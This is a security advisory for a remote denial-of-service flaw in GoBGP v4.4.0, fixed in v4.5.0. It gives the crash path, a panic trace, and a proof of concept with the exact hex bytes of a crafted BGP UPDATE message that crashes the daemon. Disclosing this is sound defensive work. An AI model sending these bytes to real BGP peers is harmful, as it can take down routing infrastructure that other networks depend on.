Summary

Remote Denial of Service (DoS) via Nil Pointer Dereference in BGP Update Processing
An unauthenticated remote BGP peer can trigger a fatal panic in GoBGP by sending a specially crafted BGP UPDATE message. When the server receives a message with inconsistent attribute lengths, it improperly handles the internal state transition to a "withdraw" action, leading to a nil pointer dereference in the AdjRib.Update function. This causes the entire GoBGP process to crash, resulting in a complete loss of service availability.

Details

The vulnerability originates in the interaction between the BGP message decoding logic and the Adj-RIB table management.

Triggering Condition: When a BGP UPDATE message contains attributes that fail validation (e.g., "attribute value length is short"), GoBGP logs a warning: the received Update message was treated as withdraw.

Code Path:

The message reaches github.com/osrg/gobgp/v4/pkg/server.(*peer).handleUpdate.

Due to the malformed attributes, the message is processed as a withdrawal, but the internal representation of the path or its attributes becomes nil.

The execution flows to internal/pkg/table/adj.go:127 within (*AdjRib).Update.

The Flaw: At line 127 in adj.go, the code attempts to access a member of a structure (likely the path or a specific attribute container) that is nil due to the previous validation failure.

Log Snippet:

{"time":"2026-04-21T12:43:10.009107962+08:00","level":"WARN","msg":"the received Update message was treated as withdraw","Topic":"Peer","Key":"192.168.31.195","State":"BGP_FSM_ESTABLISHED","Error":"attribute value length is short"}
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x8 pc=0xbca9e8]

goroutine 52 [running]:
github.com/osrg/gobgp/v4/internal/pkg/table.(*AdjRib).Update(0x1fec929b4480, {0x1fec928ca0e8, 0x1, 0xfffffffffffffffc?})
        /home/base/Desktop/gobgp/internal/pkg/table/adj.go:127 +0xa8
github.com/osrg/gobgp/v4/pkg/server.(*peer).handleUpdate(0x1fec92b90c40, 0x1fec92c0c900)
        /home/base/Desktop/gobgp/pkg/server/peer.go:656 +0xed4
github.com/osrg/gobgp/v4/pkg/server.(*BgpServer).handleFSMMessage(0x1fec928c8488, 0x1fec92b90c40, 0x1fec92c0c900)
        /home/base/Desktop/gobgp/pkg/server/server.go:1670 +0x14c6
github.com/osrg/gobgp/v4/pkg/server.(*BgpServer).startFsmHandler.func1(0x1fec935c0b00?)
        /home/base/Desktop/gobgp/pkg/server/server.go:253 +0x25
github.com/osrg/gobgp/v4/pkg/server.(*fsmHandler).recvMessageloop(0x1fec92acee40, {0x105c750, 0x1fec92970500}, {0x106a558, 0x1fec933bc000}, 0x1fec92c1a2a0, 0x1fec92c18a10, 0x0?)
        /home/base/Desktop/gobgp/pkg/server/fsm.go:1893 +0xe82
created by github.com/osrg/gobgp/v4/pkg/server.(*fsmHandler).established in goroutine 37
        /home/base/Desktop/gobgp/pkg/server/fsm.go:1920 +0x2d5

PoC

[SEND] OPEN
       Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 1d 01 04 fd ea 00 5a c3 a8 1f c3 00
[RECV] Type: 1 | Length: 77
       Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 4d 01 04 fd e9 00 5a c0 a8 1f 82 30 02 2e 02 00 49 16 14 62 61 73 65 2d 76 69 72 74 75 61 6c 2d 6d 61 63 68 69 6e 65 00 01 04 00 19 00 46 41 04 00 00 fd e9 05 06 00 19 00 46 00 02
[+] Received OPEN from peer
[SEND] KEEPALIVE
       Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 13 04
[RECV] Type: 4 | Length: 19
       Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 13 04
[+] BGP Session Established
[SEND] Crafted UPDATE
       Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 50 02 00 04 18 ac 10 01 00 35 35 01 01 04 2d 02 00 90 0e 00 19 3e 01 a8 c0 1f 82 00 02 21 00 01 c0 a8 1f 12 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 11 22 33 44 55 0f 11 80 00
[*] Waiting for peer reaction...
[+] Done.

Impact

Remote Denial of Service (DoS) in GoBGP v4.4.0

References

• GHSA-p3w2-64xm-833j
• https://github.com/osrg/gobgp/releases/tag/v4.5.0
• https://nvd.nist.gov/vuln/detail/CVE-2026-42285